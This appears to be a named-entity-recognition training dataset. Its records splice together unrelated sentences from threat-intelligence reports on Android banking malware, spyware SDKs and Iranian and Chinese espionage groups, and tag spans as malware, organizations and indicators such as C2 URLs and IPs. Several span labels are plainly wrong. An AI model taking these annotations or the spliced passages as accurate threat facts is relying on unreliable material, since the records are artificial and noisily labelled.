{"text": "We suspect the updated PIN is sent to the C2 , most likely to give the malware the option to perform privileged activities on the infected device related to payments , system configuration options , etc . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d . CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash .", "spans": [{"start": 209, "end": 219, "label": "Malware"}, {"start": 220, "end": 226, "label": "Malware"}, {"start": 252, "end": 259, "label": "Malware"}, {"start": 434, "end": 437, "label": "Organization"}, {"start": 612, "end": 619, "label": "Organization"}]}
{"text": "EventBot Listening to TYPE_VIEW_TEXT_CHANGED accessibility event Listening to TYPE_VIEW_TEXT_CHANGED accessibility event . We identified two methods to deliver the KerrDown downloader to targets . Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 123, "end": 125, "label": "Organization"}, {"start": 164, "end": 172, "label": "Malware"}, {"start": 261, "end": 273, "label": "Organization"}]}
{"text": "After collecting the changed PIN code , it is sent back to the C2 . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites .", "spans": [{"start": 101, "end": 109, "label": "Malware"}, {"start": 165, "end": 167, "label": "Organization"}, {"start": 256, "end": 268, "label": "Organization"}, {"start": 302, "end": 320, "label": "Organization"}, {"start": 323, "end": 333, "label": "Organization"}, {"start": 336, "end": 343, "label": "Organization"}, {"start": 346, "end": 349, "label": "Organization"}, {"start": 356, "end": 388, "label": "Organization"}, {"start": 447, "end": 465, "label": "Organization"}, {"start": 474, "end": 486, "label": "Organization"}]}
{"text": "EventBot Sending the pin code back to the C2 Sending the pin code back to the C2 . While investigating KerrDown we found multiple RAR files containing a variant of the malware . The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 103, "end": 111, "label": "Malware"}, {"start": 112, "end": 114, "label": "Organization"}]}
{"text": "Eventually , the screen PIN preferences will be saved to an additional XML file in the shared preferences folder . The dropped PE file has the distinctive file name 8.t\u201d . Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations .", "spans": [{"start": 127, "end": 129, "label": "System"}, {"start": 165, "end": 169, "label": "Malware"}, {"start": 222, "end": 225, "label": "Organization"}]}
{"text": "EventBot screenPinPrefs.xml The content of screenPinPrefs.xml . The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware . The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks .", "spans": [{"start": 9, "end": 27, "label": "Indicator"}, {"start": 43, "end": 61, "label": "Indicator"}, {"start": 68, "end": 75, "label": "Malware"}, {"start": 103, "end": 113, "label": "Malware"}, {"start": 216, "end": 234, "label": "Malware"}, {"start": 273, "end": 283, "label": "System"}, {"start": 303, "end": 310, "label": "Malware"}, {"start": 315, "end": 352, "label": "Malware"}]}
{"text": "The grabScreenPin method has separate conditioning to handle screen lock events in Samsung devices . The malware starts communicating with the C&C server by sending basic information about the infected machine . The survey contained macros that , once enabled , downloaded PupyRAT .", "spans": [{"start": 83, "end": 90, "label": "Organization"}, {"start": 105, "end": 112, "label": "Malware"}, {"start": 120, "end": 146, "label": "Malware"}, {"start": 273, "end": 280, "label": "Malware"}]}
{"text": "EventBot screen lock with support for Samsung devices A new method to handle screen lock with support for Samsung devices . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . CTU researchers determined that the COBALT GYPSY threat group orchestrated this activity due to the tools , techniques , and procedures ( TTPs ) used in both campaigns .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 38, "end": 45, "label": "Organization"}, {"start": 106, "end": 113, "label": "Organization"}, {"start": 128, "end": 135, "label": "Malware"}, {"start": 146, "end": 154, "label": "Malware"}, {"start": 164, "end": 178, "label": "System"}, {"start": 196, "end": 205, "label": "Organization"}, {"start": 294, "end": 297, "label": "Organization"}, {"start": 330, "end": 342, "label": "Organization"}]}
{"text": "EVENTBOT VERSION 0.4.0.1 Package Name Randomization In this version , the package name is no longer named \u2018 com.example.eventbot \u2019 , which makes it more difficult to track down . This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": [{"start": 108, "end": 128, "label": "Indicator"}, {"start": 193, "end": 201, "label": "Malware"}, {"start": 377, "end": 389, "label": "Organization"}, {"start": 420, "end": 429, "label": "Organization"}]}
{"text": "EventBot Randomized package name Randomized package name instead of com.example.eventbot . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 68, "end": 88, "label": "Indicator"}, {"start": 95, "end": 98, "label": "System"}, {"start": 107, "end": 118, "label": "Malware"}, {"start": 234, "end": 247, "label": "Organization"}, {"start": 250, "end": 259, "label": "Organization"}, {"start": 262, "end": 278, "label": "Organization"}, {"start": 285, "end": 301, "label": "Organization"}, {"start": 334, "end": 346, "label": "Organization"}, {"start": 493, "end": 497, "label": "Malware"}, {"start": 506, "end": 513, "label": "Malware"}]}
{"text": "ProGuard Obfuscation As with many other Android applications , EventBot is now using obfuscation . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . By compromising a user account that has administrative or elevated access , Magic Hound can quickly access a targeted environment to achieve their objectives .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 40, "end": 47, "label": "System"}, {"start": 63, "end": 71, "label": "Malware"}, {"start": 133, "end": 144, "label": "Malware"}, {"start": 233, "end": 240, "label": "Malware"}]}
{"text": "Both the loader and dropped class are obfuscated using ProGuard , which obfuscates names using alphabet letters . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona .", "spans": [{"start": 55, "end": 63, "label": "Indicator"}, {"start": 119, "end": 125, "label": "Malware"}, {"start": 179, "end": 203, "label": "Malware"}, {"start": 206, "end": 212, "label": "Malware"}, {"start": 215, "end": 221, "label": "Malware"}, {"start": 224, "end": 237, "label": "Malware"}, {"start": 242, "end": 256, "label": "Malware"}, {"start": 294, "end": 306, "label": "Organization"}, {"start": 384, "end": 391, "label": "Organization"}]}
{"text": "The code itself is not modified by this type of obfuscation though , making the analysis easier . It turns out that contacts data isn\u2019t the only unusual data SWAnalytics is interested in . CTU researchers have observed multiple COBALT GYPSY campaigns since 2015 and consider it highly likely that the group is associated with Iranian government-directed cyber operations .", "spans": [{"start": 116, "end": 129, "label": "Malware"}, {"start": 158, "end": 169, "label": "Malware"}, {"start": 189, "end": 192, "label": "Organization"}]}
{"text": "EventBot Obfuscated class names Obfuscated class names using letters of the alphabet . With default settings , SWAnalytics will scan through an Android device\u2019s external storage , looking for directory tencent/MobileQQ/WebViewCheck\u201d . The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 111, "end": 122, "label": "Malware"}, {"start": 128, "end": 132, "label": "Malware"}, {"start": 250, "end": 257, "label": "Malware"}, {"start": 322, "end": 328, "label": "Organization"}]}
{"text": "Hidden Configuration Data As mentioned above , EventBot begins using obfuscation . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering .", "spans": [{"start": 47, "end": 55, "label": "Malware"}, {"start": 98, "end": 114, "label": "Malware"}, {"start": 262, "end": 265, "label": "Organization"}, {"start": 292, "end": 304, "label": "Organization"}, {"start": 387, "end": 405, "label": "Organization"}]}
{"text": "Due to this obfuscation , a part of the previously mentioned cfg class is now mapped to c/b/a/a/a or c/a/a/a/a . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic .", "spans": [{"start": 116, "end": 135, "label": "Malware"}, {"start": 138, "end": 149, "label": "Malware"}, {"start": 161, "end": 178, "label": "Malware"}, {"start": 244, "end": 256, "label": "Organization"}, {"start": 307, "end": 319, "label": "Organization"}]}
{"text": "EventBot C2 URLs C2 URLs and other settings in a nested class . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . COBALT GYPSY 's continued social media use reinforces the importance of recurring social engineering training .", "spans": [{"start": 114, "end": 125, "label": "Malware"}, {"start": 148, "end": 155, "label": "Malware"}, {"start": 160, "end": 187, "label": "Malware"}, {"start": 195, "end": 201, "label": "Malware"}, {"start": 224, "end": 236, "label": "Organization"}, {"start": 250, "end": 262, "label": "Organization"}, {"start": 306, "end": 324, "label": "Organization"}]}
{"text": "Other configuration data is located elsewhere , and some of it can been seen here : The encrypted library path The output folder on the device for the dropped library The name of the library after it is loaded eventBot name string Version number A string used as an RC4 key , both for decrypting the library and as a part of the network data encryption ( hasn \u2019 t changed from the previous version ) The C2 URLs A randomized class name using the device \u2019 s accessibility services EventBot extracted configuration Part of the extracted configuration of the new version Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json\u201d . SecureWorks Counter Threat Unit ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": [{"start": 480, "end": 488, "label": "Malware"}, {"start": 637, "end": 648, "label": "Malware"}, {"start": 746, "end": 777, "label": "Organization"}, {"start": 780, "end": 783, "label": "Organization"}, {"start": 858, "end": 870, "label": "Organization"}]}
{"text": ". In order to understand SWAnalytics\u2019 impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . SecureWorks\u00ae Counter Threat Unit\u2122 ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": [{"start": 25, "end": 37, "label": "Malware"}, {"start": 207, "end": 240, "label": "Organization"}, {"start": 243, "end": 246, "label": "Organization"}, {"start": 321, "end": 333, "label": "Organization"}]}
{"text": "MALWARE UNDER ACTIVE DEVELOPMENT EventBot \u201c cfg \u201d class EventBot \u201c cfg \u201d class . According to Cheetah Mobile\u2019s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY threat group ( formerly labeled Threat Group-2889 ) .", "spans": [{"start": 33, "end": 41, "label": "Malware"}, {"start": 56, "end": 64, "label": "Malware"}, {"start": 187, "end": 194, "label": "Malware"}, {"start": 197, "end": 203, "label": "Malware"}, {"start": 222, "end": 233, "label": "Malware"}, {"start": 236, "end": 239, "label": "Organization"}, {"start": 301, "end": 307, "label": "Organization"}, {"start": 356, "end": 368, "label": "Organization"}, {"start": 401, "end": 418, "label": "Organization"}]}
{"text": "EventBot is in constant development , as seen with the botnetID string above , which shows consecutive numbering across versions . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . Since early 2014 , an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection , supported by persistent spear phishing campaigns .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 162, "end": 167, "label": "Organization"}, {"start": 182, "end": 194, "label": "System"}, {"start": 259, "end": 264, "label": "Organization"}, {"start": 335, "end": 347, "label": "Malware"}]}
{"text": "This example is from a later version of EventBot , and in other versions the naming convention is very similar , with bot IDs such as word100 , word101 , word102 , and test2005 , test2006 etc . Webinjects targeting Japan , a country we haven\u2019t seen targeted by Panda Banker before . This cyber-espionage group was dubbed ' Rocket Kitten ' , and remains active as of this writing , with reported attacks as recent as October 2015 .", "spans": [{"start": 40, "end": 48, "label": "Malware"}, {"start": 261, "end": 273, "label": "Malware"}, {"start": 323, "end": 336, "label": "Organization"}]}
{"text": "In the latest version , a layer of obfuscation was added , perhaps taking the malware one step closer to being fully operational . Japan is no stranger to banking malware . Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East ( including targets inside Iran itself ) , as well as across Europe and in the United States .", "spans": [{"start": 155, "end": 162, "label": "Malware"}, {"start": 163, "end": 170, "label": "Malware"}, {"start": 201, "end": 232, "label": "Malware"}]}
{"text": "SUSPECTED DETECTION TESTS BY THE THREAT ACTOR In searching for EventBot , we \u2019 ve identified multiple submissions from the same submitter hash , 22b3c7b0 : EventBot 22b3c7b0 submitter hash The 22b3c7b0 submitter hash that submitted most of the EventBot samples to VirusTotal . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 63, "end": 71, "label": "Malware"}, {"start": 145, "end": 153, "label": "Indicator"}, {"start": 156, "end": 164, "label": "Malware"}, {"start": 165, "end": 173, "label": "Indicator"}, {"start": 193, "end": 201, "label": "Indicator"}, {"start": 244, "end": 252, "label": "Malware"}, {"start": 353, "end": 359, "label": "Malware"}, {"start": 364, "end": 371, "label": "Malware"}, {"start": 495, "end": 508, "label": "Organization"}, {"start": 526, "end": 539, "label": "Organization"}, {"start": 545, "end": 556, "label": "Organization"}, {"start": 611, "end": 621, "label": "Organization"}]}
{"text": "This submitter has thousands of other submissions in VirusTotal , however , it is the only one that continues to submit EventBot samples via the VirusTotal API . This post was our first analysis of the first Panda Banker campaign that we\u2019ve seen to target financial institutions in Japan . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": [{"start": 120, "end": 128, "label": "Malware"}, {"start": 208, "end": 220, "label": "Malware"}, {"start": 256, "end": 278, "label": "Organization"}, {"start": 330, "end": 343, "label": "Organization"}, {"start": 359, "end": 372, "label": "Organization"}, {"start": 378, "end": 389, "label": "Organization"}, {"start": 444, "end": 454, "label": "Organization"}]}
{"text": "Also , the botnet IDs increment over time as they are submitted . We believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows\u2019 systems . The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel .", "spans": [{"start": 66, "end": 68, "label": "Organization"}, {"start": 178, "end": 184, "label": "Malware"}, {"start": 286, "end": 295, "label": "Organization"}, {"start": 298, "end": 306, "label": "Organization"}, {"start": 311, "end": 327, "label": "Organization"}]}
{"text": "Given this , and the naming convention of the submissions ( .virus ) , the submitter hash most likely belongs to an AV vendor or sandboxing environment that automatically submits samples to online malware databases . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . ClearSky 's September 2014 blog post first described active attacks using a piece of malware they dubbed ' Gholee ' ( as appears in a malicious payload export function , potentially named after a popular Iranian singer9 ) .", "spans": [{"start": 231, "end": 237, "label": "Malware"}, {"start": 250, "end": 262, "label": "Malware"}, {"start": 322, "end": 328, "label": "Malware"}, {"start": 346, "end": 354, "label": "Malware"}, {"start": 357, "end": 365, "label": "Organization"}, {"start": 464, "end": 470, "label": "Malware"}]}
{"text": "It may be that these submissions are made from the author \u2019 s machine , or that they submit it to a detection service that in turn submits to online malware databases . Madcap\u201d is similar to the XAgent malware , but the former is focused on recording audio . The Rocket Kitten attacker group 's main attack vector is spear-phishing .", "spans": [{"start": 169, "end": 176, "label": "Malware"}, {"start": 195, "end": 201, "label": "Malware"}, {"start": 263, "end": 276, "label": "Organization"}]}
{"text": "EVENTBOT THREAT ACTORS As a part of this investigation , the Cybereason Nocturnus team has attempted to identify the threat actors behind the development of EventBot . This full-blown spying framework consists of two packages named \u2018Tokyo\u2019 and \u2018Yokohama\u2019 . After learning of an active attack incident from the Rocket Kitten group on a customer network , Check Point researchers decided to actively join the investigation .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 61, "end": 81, "label": "Organization"}, {"start": 157, "end": 165, "label": "Malware"}, {"start": 232, "end": 239, "label": "Malware"}, {"start": 244, "end": 254, "label": "Malware"}, {"start": 310, "end": 329, "label": "Organization"}, {"start": 354, "end": 365, "label": "Organization"}]}
{"text": "The evidence above suggests that EventBot is still in the development stage , and as such , is not likely to have been used for large attack campaigns thus far . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . As described in previous publications , the Rocket Kitten attackers make extensive use of various phishing schemes .", "spans": [{"start": 33, "end": 41, "label": "Malware"}, {"start": 199, "end": 207, "label": "Malware"}, {"start": 219, "end": 229, "label": "Malware"}, {"start": 338, "end": 351, "label": "Organization"}, {"start": 352, "end": 361, "label": "Organization"}]}
{"text": "The Cybereason Nocturnus team is monitoring multiple underground platforms in an attempt to identify chatter relating to EventBot . The first confirmed date when TajMahal samples were seen on a victim\u2019s machine is August 2014 . While the recent paper from Trend Micro and ClearSky ( ' The Spy Kittens Are Back : Rocket Kitten 2 ' ) does extensively cover the campaign 's narrative , we aimed to seek confirmation that our analyzed attack was positively connected to the same campaign and set out to provide additional value and insight .", "spans": [{"start": 4, "end": 24, "label": "Organization"}, {"start": 121, "end": 129, "label": "Malware"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 256, "end": 267, "label": "Organization"}, {"start": 272, "end": 280, "label": "Organization"}, {"start": 289, "end": 300, "label": "Organization"}, {"start": 312, "end": 325, "label": "Organization"}]}
{"text": "New malware is often introduced to underground communities by being promoted and sold or offered as a giveaway . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com) . As the Rocket Kitten group 's behavior was well characterized in previous publications ( see the recent report from Trend Micro and ClearSky ) .", "spans": [{"start": 132, "end": 140, "label": "Malware"}, {"start": 175, "end": 184, "label": "Organization"}, {"start": 262, "end": 281, "label": "Organization"}, {"start": 371, "end": 382, "label": "Organization"}, {"start": 387, "end": 395, "label": "Organization"}]}
{"text": "However , at the time of writing , we were unable to identify relevant conversations about the EventBot malware . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . Magic Hound will often find simpler ACTs for effective compromise , such as creative phishing and simple custom malware .", "spans": [{"start": 95, "end": 103, "label": "Malware"}, {"start": 185, "end": 197, "label": "Malware"}, {"start": 224, "end": 234, "label": "Organization"}]}
{"text": "This strengthens our suspicion that this malware is still undergoing development and has not been officially marketed or released yet . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper . We present the connection between Behzad Mesri , an Iranian national recently indicted for his involvement in hacking HBO , and Charming Kitten .", "spans": [{"start": 206, "end": 215, "label": "Malware"}, {"start": 283, "end": 295, "label": "Malware"}, {"start": 332, "end": 344, "label": "Organization"}, {"start": 426, "end": 441, "label": "Organization"}]}
{"text": "EVENTBOT INFRASTRUCTURE By mapping the C2 servers , a clear , repeated pattern emerges based on the specific URL gate_cb8a5aea1ab302f0_c . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 187, "end": 199, "label": "Malware"}, {"start": 254, "end": 277, "label": "Malware"}, {"start": 492, "end": 505, "label": "Organization"}, {"start": 516, "end": 523, "label": "Organization"}, {"start": 528, "end": 540, "label": "Organization"}]}
{"text": "As of this writing , all the domains were registered recently and some are already offline . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report - \" Flying Kitten to Rocket Kitten , A Case of Ambiguity and Shared Code \" 3 by Collin Anderson and Claudio Guarnieri .", "spans": [{"start": 136, "end": 146, "label": "Malware"}, {"start": 169, "end": 181, "label": "Malware"}, {"start": 261, "end": 270, "label": "Malware"}, {"start": 412, "end": 425, "label": "Organization"}, {"start": 429, "end": 442, "label": "Organization"}]}
{"text": "URL Status IP Domain registration date http : //ora.studiolegalebasili [ . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . FireEye 's publication of \" Operation Saffron Rose \" report , which described Flying Kitten 's operations against aviation firms , led to the dismantling of Flying Kitten 's infrastructure and the apparent end of its activities .", "spans": [{"start": 39, "end": 74, "label": "Indicator"}, {"start": 78, "end": 88, "label": "Organization"}, {"start": 220, "end": 232, "label": "Malware"}, {"start": 235, "end": 242, "label": "Organization"}, {"start": 313, "end": 326, "label": "Organization"}, {"start": 349, "end": 363, "label": "Organization"}, {"start": 392, "end": 405, "label": "Organization"}]}
{"text": "] com/gate_cb8a5aea1ab302f0_c offline 31.214.157 [ . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's .", "spans": [{"start": 38, "end": 52, "label": "Indicator"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 102, "end": 120, "label": "Malware"}, {"start": 143, "end": 160, "label": "Malware"}, {"start": 223, "end": 229, "label": "Organization"}, {"start": 232, "end": 244, "label": "Organization"}, {"start": 260, "end": 274, "label": "Organization"}, {"start": 286, "end": 296, "label": "Organization"}, {"start": 360, "end": 370, "label": "Malware"}, {"start": 373, "end": 384, "label": "Malware"}, {"start": 433, "end": 441, "label": "Organization"}, {"start": 452, "end": 464, "label": "Organization"}]}
{"text": "] 6 2020-02-29 http : //themoil [ . We didn\u2019t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . Charming kitten regularly target international media outlets with Persian-language services .", "spans": [{"start": 15, "end": 35, "label": "Indicator"}, {"start": 87, "end": 99, "label": "Malware"}, {"start": 120, "end": 131, "label": "Malware"}, {"start": 145, "end": 160, "label": "Organization"}, {"start": 192, "end": 197, "label": "Organization"}]}
{"text": "] site/gate_cb8a5aea1ab302f0_c online 208.91.197 [ . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . It was a decoy to make visitor download a \" Flash Player \" , which was in fact DownPaper malware , analyzed later in this report .", "spans": [{"start": 38, "end": 52, "label": "Indicator"}, {"start": 69, "end": 80, "label": "Malware"}, {"start": 105, "end": 125, "label": "Malware"}, {"start": 179, "end": 184, "label": "System"}, {"start": 214, "end": 223, "label": "Malware"}, {"start": 224, "end": 231, "label": "Malware"}]}
{"text": "] 91 2020-03-04 http : //ora.carlaarrabitoarchitetto [ . RocketMan!\u201d (probably a reference to Donald Trump\u2019s nickname for Kim Jong Un) and MiamiBeach\u201d serve as the first beacon messages from the victim to the control server . In addition to using PlugX and Poison Ivy ( PIVY ) , both known to be used by the group , they also used a new Trojan called \" ChChes \" by the Japan Computer Emergency Response Team Coordination Center ( JPCERT ) .", "spans": [{"start": 16, "end": 56, "label": "Indicator"}, {"start": 57, "end": 68, "label": "Malware"}, {"start": 139, "end": 150, "label": "Malware"}, {"start": 247, "end": 252, "label": "Malware"}, {"start": 257, "end": 267, "label": "Malware"}, {"start": 270, "end": 274, "label": "Malware"}, {"start": 337, "end": 343, "label": "Malware"}, {"start": 353, "end": 359, "label": "Malware"}, {"start": 369, "end": 427, "label": "Organization"}, {"start": 430, "end": 436, "label": "Organization"}]}
{"text": "] com/gate_cb8a5aea1ab302f0_c offline 31.214.157 [ . These could be tools to circumvent internet censorship , such as Softether VPN 4.12\u201d and psiphon3\u201d , or Microsoft Office activators\u201d . Wapack labs also observed a similar sample targeting Japan in November .", "spans": [{"start": 38, "end": 52, "label": "Indicator"}, {"start": 118, "end": 137, "label": "Malware"}, {"start": 142, "end": 151, "label": "Malware"}, {"start": 157, "end": 185, "label": "Malware"}, {"start": 188, "end": 194, "label": "Organization"}]}
{"text": "] 6 2020-03-26 http : //rxc.rxcoordinator [ . These campaign-related VPSs are located in South Africa . MenuPass spoofed several sender email addresses to send spear phishing emails , most notably public addresses associated with the Sasakawa Peace Foundation and The White House .", "spans": [{"start": 15, "end": 45, "label": "Indicator"}, {"start": 69, "end": 73, "label": "Organization"}, {"start": 104, "end": 112, "label": "Organization"}, {"start": 175, "end": 181, "label": "System"}, {"start": 234, "end": 259, "label": "Organization"}, {"start": 268, "end": 279, "label": "Organization"}]}
{"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . menuPass typically makes use of a mix of DDNS and actor-registered domains in their attack campaigns .", "spans": [{"start": 37, "end": 52, "label": "Indicator"}, {"start": 86, "end": 92, "label": "Malware"}, {"start": 114, "end": 120, "label": "Malware"}, {"start": 123, "end": 131, "label": "Malware"}, {"start": 136, "end": 149, "label": "Malware"}, {"start": 152, "end": 178, "label": "Malware"}, {"start": 222, "end": 255, "label": "Malware"}]}
{"text": "] 102 2020-03-29 http : //ora.blindsidefantasy [ . The PowerShell version of the Trojan also has the ability to get screenshots . There is not much public information about the APT campaign called menuPass ( also known as Stone Panda and APT10 ) .", "spans": [{"start": 17, "end": 50, "label": "Indicator"}, {"start": 55, "end": 65, "label": "Malware"}, {"start": 112, "end": 115, "label": "Malware"}, {"start": 116, "end": 127, "label": "Malware"}, {"start": 197, "end": 205, "label": "Organization"}, {"start": 222, "end": 233, "label": "Organization"}, {"start": 238, "end": 243, "label": "Organization"}]}
{"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen\u201d command to take a screenshot . A paper from FireEye in 2013 on several campaigns using PIVY included menuPass as one of them .", "spans": [{"start": 37, "end": 52, "label": "Indicator"}, {"start": 57, "end": 63, "label": "Malware"}, {"start": 88, "end": 109, "label": "Malware"}, {"start": 228, "end": 235, "label": "Organization"}, {"start": 271, "end": 275, "label": "Malware"}]}
{"text": "] 102 2020-04-02 http : //marta.martatovaglieri [ . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . Believed to have started activity in 2009 and to originate from China , the group initially was known for targeting US and overseas defense contractors but broadened their targeting as time passed .", "spans": [{"start": 17, "end": 51, "label": "Indicator"}, {"start": 74, "end": 82, "label": "Malware"}, {"start": 121, "end": 127, "label": "Organization"}, {"start": 226, "end": 248, "label": "Malware"}, {"start": 429, "end": 448, "label": "Organization"}]}
{"text": "] it/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . menuPass has targeted individuals and organizations in Japan since at least 2014 , and as the same organizations and academics were largely targeted each month in these attacks , it further shows menuPass is persistent in attempts to compromise their targets .", "spans": [{"start": 36, "end": 51, "label": "Indicator"}, {"start": 52, "end": 61, "label": "Malware"}, {"start": 95, "end": 102, "label": "Malware"}, {"start": 172, "end": 182, "label": "Malware"}]}
{"text": "] 102 2020-04-14 http : //pub.douglasshome [ . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . menuPass also heavily favors spear phishing , and so takes steps to socially engineer their spear phishes for maximum appearance of legitimacy .", "spans": [{"start": 17, "end": 46, "label": "Indicator"}, {"start": 52, "end": 61, "label": "Malware"}, {"start": 66, "end": 76, "label": "Malware"}]}
{"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.249 [ . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . menuPass is an ongoing APT campaign with a broad range of targets and will likely continue to target Japan in the future .", "spans": [{"start": 37, "end": 52, "label": "Indicator"}, {"start": 86, "end": 96, "label": "Malware"}, {"start": 281, "end": 295, "label": "Vulnerability"}]}
{"text": "] 141 2020-04-26 In the course of the investigation , the team discovered a potential link to an additional Android infostealer . The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints .", "spans": [{"start": 108, "end": 127, "label": "Malware"}, {"start": 134, "end": 142, "label": "Malware"}, {"start": 147, "end": 154, "label": "Malware"}, {"start": 233, "end": 242, "label": "Indicator"}, {"start": 279, "end": 296, "label": "Organization"}]}
